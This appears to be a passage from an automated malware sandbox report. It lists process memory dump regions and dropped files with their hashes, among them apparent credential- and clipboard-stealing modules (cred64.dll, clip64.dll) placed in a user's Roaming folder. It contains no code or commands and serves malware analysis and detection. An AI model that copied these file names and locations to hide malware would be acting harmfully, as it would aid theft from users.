memory/5780-344-0x0000000000400000-0x0000000000431000-memory.dmp

memory/5708-347-0x0000000002080000-0x00000000020DA000-memory.dmp

memory/5580-351-0x0000000072B70000-0x0000000073320000-memory.dmp

memory/5512-354-0x0000000004340000-0x0000000004742000-memory.dmp

memory/5828-355-0x00000000051F0000-0x0000000005200000-memory.dmp

memory/5512-356-0x0000000004850000-0x000000000513B000-memory.dmp

memory/5580-357-0x0000000005E20000-0x0000000005E30000-memory.dmp

memory/5512-360-0x0000000000400000-0x000000000266D000-memory.dmp

memory/5708-363-0x0000000072B70000-0x0000000073320000-memory.dmp

memory/5708-366-0x0000000007760000-0x0000000007770000-memory.dmp

memory/5864-362-0x0000000000400000-0x0000000000409000-memory.dmp

memory/2540-361-0x0000000008120000-0x0000000008136000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State

MD5 285252a2f6327d41eab203dc2f402c67
SHA1 acedb7ba5fbc3ce914a8bf386a6f72ca7baa33c6
SHA256 5dfc321417fc31359f23320ea68014ebfd793c5bbed55f77dab4180bbd4a2026
SHA512 11ce7cb484fee66894e63c31db0d6b7ef66ad0327d4e7e2eb85f3bcc2e836a3a522c68d681e84542e471e54f765e091efe1ee4065641b0299b15613eb32dcc0d

memory/5708-385-0x0000000008100000-0x0000000008166000-memory.dmp

memory/5512-384-0x0000000000400000-0x000000000266D000-memory.dmp

memory/5640-386-0x00007FF6F6990000-0x00007FF6F6F31000-memory.dmp

memory/5708-390-0x00000000089E0000-0x0000000008A30000-memory.dmp

memory/5708-391-0x0000000008A50000-0x0000000008AC6000-memory.dmp

memory/5580-398-0x0000000005F80000-0x0000000005F9C000-memory.dmp

memory/5580-399-0x0000000005F80000-0x0000000005F95000-memory.dmp

memory/5580-400-0x0000000005F80000-0x0000000005F95000-memory.dmp

memory/2844-401-0x0000000002AA0000-0x0000000002AD6000-memory.dmp

memory/2844-404-0x0000000072B70000-0x0000000073320000-memory.dmp

memory/5580-403-0x0000000005F80000-0x0000000005F95000-memory.dmp

memory/5580-406-0x0000000005F80000-0x0000000005F95000-memory.dmp

memory/2844-407-0x00000000052B0000-0x00000000058D8000-memory.dmp

memory/2844-413-0x0000000004C70000-0x0000000004C80000-memory.dmp

memory/5708-412-0x00000000099C0000-0x0000000009B82000-memory.dmp

memory/5580-414-0x0000000005F80000-0x0000000005F95000-memory.dmp

memory/5708-416-0x0000000009B90000-0x000000000A0BC000-memory.dmp

memory/5580-419-0x0000000005F80000-0x0000000005F95000-memory.dmp

memory/5580-417-0x0000000005F80000-0x0000000005F95000-memory.dmp

memory/5580-429-0x0000000005F80000-0x0000000005F95000-memory.dmp

memory/5580-410-0x0000000005F80000-0x0000000005F95000-memory.dmp

memory/2844-409-0x0000000004C70000-0x0000000004C80000-memory.dmp

memory/5708-431-0x000000000A130000-0x000000000A14E000-memory.dmp

memory/5580-432-0x0000000005F80000-0x0000000005F95000-memory.dmp

memory/5580-435-0x0000000005F80000-0x0000000005F95000-memory.dmp

memory/5580-443-0x0000000005F80000-0x0000000005F95000-memory.dmp

memory/2844-445-0x0000000005910000-0x0000000005932000-memory.dmp

memory/2844-455-0x00000000059B0000-0x0000000005A16000-memory.dmp

memory/5420-462-0x0000000000400000-0x000000000047F000-memory.dmp

memory/5580-465-0x00000000061D0000-0x00000000061D1000-memory.dmp

memory/5708-460-0x0000000000400000-0x000000000046F000-memory.dmp

memory/5420-466-0x0000000000400000-0x000000000047F000-memory.dmp

memory/5420-467-0x0000000000400000-0x000000000047F000-memory.dmp

memory/2844-469-0x0000000005C00000-0x0000000005F54000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_zbw54cvf.41i.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/5580-447-0x0000000005F80000-0x0000000005F95000-memory.dmp

memory/5580-470-0x0000000072B70000-0x0000000073320000-memory.dmp

memory/5828-444-0x0000000072B70000-0x0000000073320000-memory.dmp

memory/5512-475-0x0000000000400000-0x000000000266D000-memory.dmp

memory/5828-476-0x00000000051F0000-0x0000000005200000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\tmpBF6D.tmp

MD5 02d2c46697e3714e49f46b680b9a6b83
SHA1 84f98b56d49f01e9b6b76a4e21accf64fd319140
SHA256 522cad95d3fa6ebb3274709b8d09bbb1ca37389d0a924cd29e934a75aa04c6c9
SHA512 60348a145bfc71b1e07cb35fa79ab5ff472a3d0a557741ea2d39b3772bc395b86e261bd616f65307ae0d997294e49b5548d32f11e86ef3e2704959ca63da8aac

C:\Users\Admin\AppData\Local\Temp\tmpC04E.tmp

MD5 8395952fd7f884ddb74e81045da7a35e
SHA1 f0f7f233824600f49147252374bc4cdfab3594b9
SHA256 248c0c254592c08684c603ac37896813354c88ab5992fadf9d719ec5b958af58
SHA512 ea296a74758c94f98c352ff7d64c85dcd23410f9b4d3b1713218b8ee45c6b02febff53073819c973da0207471c7d70309461d47949e4d40ba7423328cf23f6cd

C:\Users\Admin\AppData\Local\Temp\tmpC1C1.tmp

MD5 349e6eb110e34a08924d92f6b334801d
SHA1 bdfb289daff51890cc71697b6322aa4b35ec9169
SHA256 c9fd7be4579e4aa942e8c2b44ab10115fa6c2fe6afd0c584865413d9d53f3b2a
SHA512 2a635b815a5e117ea181ee79305ee1baf591459427acc5210d8c6c7e447be3513ead871c605eb3d32e4ab4111b2a335f26520d0ef8c1245a4af44e1faec44574

C:\Users\Admin\AppData\Local\Temp\tmpC273.tmp

MD5 c495c9f0285d7d107a4efe0501d245eb
SHA1 c11caac1ec41ae92d9ddd2e9bb4c1783fee0e147
SHA256 e3a188f4354a75c974d4f5d9907259c73200593bcbd9e2ad3d2952216d88ac1c
SHA512 a60847b25882af25336f48d4584f8c1e1648bed2523906a5591e9846c9d7f578f016f3cc002c35a40b7427abd15bee2ffcd5df46705e07fabe7fab3a13c4970f

C:\Users\Admin\AppData\Local\Temp\tmpC302.tmp

MD5 f70aa3fa04f0536280f872ad17973c3d
SHA1 50a7b889329a92de1b272d0ecf5fce87395d3123
SHA256 8d782aa65de6db3538a14da82216e96d5e0a3c60496726e3541a8165bccc65f8
SHA512 30675c5c610d9aa32a4c4a4d9c3af7570823cd197f8d2a709222c78e2cd15304bbed80e233e3674ec2f6e33d1961c67fd6a46dc8ba8b1a301cd0722932c03c84

C:\Users\Admin\AppData\Local\Temp\tmpC3AA.tmp

MD5 d367ddfda80fdcf578726bc3b0bc3e3c
SHA1 23fcd5e4e0e5e296bee7e5224a8404ecd92cf671
SHA256 0b8607fdf72f3e651a2a8b0ac7be171b4cb44909d76bb8d6c47393b8ea3d84a0
SHA512 40e9239e3f084b4b981431817ca282feb986cf49227911bf3d68845baf2ee626b564c8fabe6e13b97e6eb214da1c02ca09a62bcf5e837900160cf479c104bf77

C:\Users\Admin\AppData\Roaming\006700e5a2ab05\cred64.dll

MD5 a5b509a3fb95cc3c8d89cd39fc2a30fb
SHA1 5aff4266a9c0f2af440f28aa865cebc5ddb9cd5c
SHA256 5f3c80056c7b1104c15d6fee49dac07e665c6ffd0795ad486803641ed619c529
SHA512 3cc58d989c461a04f29acbfe03ed05f970b3b3e97e6819962fc5c853f55bce7f7aba0544a712e3a45ee52ab31943c898f6b3684d755b590e3e961ae5ecd1edb9

C:\Users\Admin\AppData\Roaming\006700e5a2ab05\clip64.dll

MD5 e913b0d252d36f7c9b71268df4f634fb
SHA1 5ac70d8793712bcd8ede477071146bbb42d3f018
SHA256 4cf5b584cf79ac523f645807a65bc153fbeaa564c0e1acb4dac9004fc9d038da
SHA512 3ea08f0897c1b7b5859961351eef59840bbf319a6ad7ebe1c9e1b5e2ce25588d7b1a37fd6c5417653521fc73f1f42eb043d0ee6fcd645aa92b8f305d726273b4